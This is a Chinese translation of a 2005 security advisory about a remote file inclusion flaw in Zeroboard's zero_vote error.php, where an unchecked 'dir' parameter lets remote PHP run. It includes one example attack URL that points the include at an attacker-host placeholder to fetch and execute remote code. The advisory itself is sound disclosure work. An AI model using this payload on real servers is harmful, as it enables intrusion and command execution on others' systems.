首页 网络安全 安全学院 查看内容

ZeroBoard文件执行漏洞

2005-6-2 04:35 939 0

摘要: Zeroboard 'zero_vote'包含文件漏洞导致远程用户执行任意命令 翻译网站:http://www.bnso.net 翻译:Z.C.Y[B.C.T] 安全公告:1012812资料来源...
关键词: 漏洞 用户 Zeroboard http 远程 任意 系统 命令 输入 目标

Zeroboard 'zero_vote'包含文件漏洞导致远程用户执行任意命令 翻译网站:http://www.bnso.net 翻译:Z.C.Y[B.C.T] 安全公告:1012812资料来源:http://securitytracker.com/id?1012812 CVE 参考:GENERIC-MAP-NOMATCH发布日期:2005-1-9发布作者:"Optik4Lab" <[email protected]>漏洞影响:执行任意代码 用户进入系统影响系统:Linux (Any), UNIX (Any), Windows (Any)漏洞利用程序包含:是厂商站点:http://www.nzeo.com/?channel=zeroboard 漏洞起因:Access控制错误 输入合法性错误 漏洞描述:Optik4Lab发现在Zeroboard的'zero_vote'中存在输入合法性漏洞,导致远程用户可以在目标系统上执行任意命令。在'dir'参数中的'error.php'脚本对用户的输入验证不严。远程用户可以精心构造一个URL导致任意PHP代码从远程位置到被目标系统包含并执行。 PHP代码包括操作系统命令都是以目标网站服务的权限运行。 示例: http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker] 原始资料:http://www.optik4lab.com/modules/news/article.php?storyid=13 解决方法:目前厂商还没有提供补丁或者升级程序
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部